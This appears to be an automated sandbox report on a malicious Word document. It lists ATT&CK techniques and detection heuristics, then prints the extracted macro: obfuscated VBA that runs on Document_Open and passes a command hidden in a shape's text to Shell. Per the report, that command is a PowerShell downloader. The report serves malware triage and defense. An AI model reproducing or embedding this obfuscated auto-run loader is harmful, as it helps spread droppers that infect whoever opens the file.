MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1059.003 Windows Command Shell
The sample contains a Document_Open VBA macro that utilizes the Shell() function to execute a command. This command constructs a complex string that includes multiple URLs and then uses PowerShell to download and execute a second-stage payload. The presence of cmd.exe and PowerShell invocations, along with the embedded URLs, strongly indicates a downloader or dropper functionality.
Heuristics 9
-
ClamAV: Doc.Malware.Dkah-6765261-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dkah-6765261-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
WvnaYo = CByte(190683170) lGhpY = Array(uwVTH, Interaction.Shell(ijJrkuEPzd, zFAiHw), uZIpwiPOp) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6127 bytes |
SHA-256: ffd33b332fa24b088e827112573bd89076b19b96e336fcca6da1af775cb1a592 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
128 of 195 identifiers look randomly generated (e.g. 'djLvvdOHQVNFp') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "djLvvdOHQVNFp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
HHzYVd = Atn(zmQqqwQO)
tqbUb = CLng(qKCpKs)
ZjkDtj = Cos(nHkbiC)
aPNYBqJd = CByte(dsnqRpWfT)
mNjFnEkDN = CByte(250988994)
zqZfP = CBool(308240298)
RICEvlHK = ptwkE
mQYqK = 171256116
Qmwrod = CByte(10533968)
On Error Resume Next
mmwFEcKSQ = Atn(aaMAVT)
QTLzM = CLng(IaAhYRdVm)
OLrMkaO = Cos(lZiVHusrd)
FJVsZr = CByte(fEvmAmwn)
wodHXqESM = CByte(256926545)
mSFpjn = CBool(118542378)
dFWlzX = VTHkm
hIvDNVoP = 33979936
fmbBM = CByte(331258523)
Set MUjKt = Shapes("OTTJIaj")
On Error Resume Next
oTlur = Atn(mqlEGOZw)
JFijhwq = CLng(kjGEDLnM)
YqjuQcb = Cos(lXhvcW)
zwizEMPFz = CByte(AOkcifws)
qiMcsdH = CByte(82012205)
ZIqHJJEFd = CBool(272259149)
SIlmM = NqsCri
BjPmW = 276171471
wATjor = CByte(297576142)
ijJrkuEPzd = MUjKt.TextFrame.ContainingRange
On Error Resume Next
mJYEvbDzO = Atn(trmZC)
fKhSYzo = CLng(kpcDbr)
JCJZOQGz = Cos(TzRbv)
TOEzmr = CByte(mXoVGT)
zAYWS = CByte(236639815)
cznEZLbz = CBool(174127811)
NVaVOzdF = rPmktKmtF
ZuILVr = 94827526
sNfqnw = CByte(60706384)
On Error Resume Next
jfZzO = Atn(ncjEu)
oYrssc = CLng(FHAzVrATN)
bGbZQim = Cos(FjQjfj)
dbluBG = CByte(jMHwjjD)
NlZwF = CByte(331838805)
oXuEcm = CBool(299026864)
VcQjsQP = MXAXORT
FMzVfKhdR = 69010352
NAwdnpjl = CByte(135448091)
On Error Resume Next
ZcjiNwq = Atn(frtYrENrP)
AjOoNabP = CLng(SShOPtFZG)
WtabAah = Cos(hXErGwQRF)
lOFCwD = CByte(iwddflf)
PspZE = CByte(91925882)
fdtrob = CBool(83421334)
zwntnsWT = XEWbETCmZ
qFbrBzYi = 186453979
GOwRP = CByte(209923872)
On Error Resume Next
AjAIu = Atn(fzZWbifR)
KjBrGVAq = CLng(hVhRJ)
SHAoHT = Cos(OEjiHdz)
CpPBp = CByte(TXUfA)
qbYzNqGEU = CByte(194937586)
JNpVwIYOX = CBool(282798583)
ffSQT = zjjJHZ
nfjVRWv = 233697862
wFoAmWP = CByte(316268513)
On Error Resume Next
UHvYDa = Atn(FmSJYGrz)
nIUsIBOVG = CLng(qIdAMn)
CjUuDi = Cos(FEhzWEfcz)
MNdhF = CByte(saRlkj)
mFVHEKc = CByte(36804658)
aVnDUPzC = CBool(259115540)
IbnwKj = OcUlwPYcv
AzaSXvbnH = 303053877
wdaPz = CByte(147508158)
On Error Resume Next
lamUmw = Atn(iMjBr)
iNOwbjK = CLng(sZOVjBAK)
qrSLNR = Cos(HKpjrG)
VTAfnQdzX = CByte(isBYzD)
IXtpJYRRv = CByte(340546942)
RtiomjsBi = CBool(147315917)
tpsTBj = QqHHvXT
AMujNs = 111783553
jdnqGRjw = CByte(133867308)
Const zFAiHw = 0
On Error Resume Next
wqUrj = Atn(UsCNrjhRQ)
nrDPmp = CLng(QNXzjA)
GPpPiznt = Cos(shzocA)
Rvrdj = CByte(jqXHX)
dIwos = CByte(124709574)
ctRjR = CBool(207874219)
YKimBpPEF = pWzzj
sbbjPJwsH = 142168580
YOzLZwp = CByte(226651696)
On Error Resume Next
rsTaH = Atn(pMUUDV)
RNoXPPq = CLng(WfCaEYi)
IbdVYc = Cos(YEQiBahDq)
PhOdj = CByte(aOZUNRAC)
LwMtaADo = CByte(141856682)
TzjoFp = CBool(180073772)
VpqQlc = DHwIiHEOu
dUKQFLtsO = 88173325
tZUimFiM = CByte(323588937)
On Error Resume Next
bsKVK = Atn(izXnVw)
LbCzFp = CLng(oCJkJADX)
WQQECGkS = Cos(rKTzYiP)
hBiKB = CByte(IPSZi)
LJLKPAW = CByte(32908082)
KFrjdNfQq = CBool(192338905)
UBTCsZUO = ojjBs
izIiYH = 66688321
WvnaYo = CByte(190683170)
lGhpY = Array(uwVTH, Interaction.Shell(ijJrkuEPzd, zFAiHw), uZIpwiPOp)
On Error Resume Next
EupYwld = Atn(zJBWkz)
fiAcQRiWr = CLng(aIkJUaPj)
ztHlEm = Cos(vKSbWZQD)
fJAfMaX = CByte(nWdtBdjmq)
zAYwvq = CByte(196444003)
TDQOArj = CBool(219856394)
RPAGZVKz = JtuhjojH
CEiNKC = 280369293
UjZVl = CByte(85003387)
On Error Resume Next
vBAhQPap = Atn(aDZjchhRB)
RdEbp = CLng(mJNNdzaA)
IbVKifJ = Cos(HJqzZm)
zifos = CByte(qZKti)
NbLdd = CByte(168787041)
UGMHX = CBool(191391185)
IzSwr = WFQzRl
RRBKR = 1811355
wsvjNXQ = CByte(119937038)
On Error Resume Next
NirhPSs = Atn(FikbzIEBs)
KrwcH = CLng(WBbjAzAY)
lJziLCwz = Cos(qsFIBUNNc)
uAdlbELNr = CByte(vIiMvN)
GSjzLuzlP = CByte(217443174)
AGSnUB = CBool(191650299)
IXWiApHl = iNtMo
HuvzjFd = 2519266
XwNltI = CByte(261301036)
On Error Resume Next
TnwCn = Atn(MvudE)
XjnjWz = CLng(GYAufvILz)
nsYAPG = Cos(nzWLuW)
zJoKQQ = CByte(aJtYf)
sQGfwO = CByte(244144586)
kfJIZ = CBool(151226417)
XclMCnzWH = uhHNifcjn
XsrPflG = 81680282
iCqtKDh = CByte(49332319)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.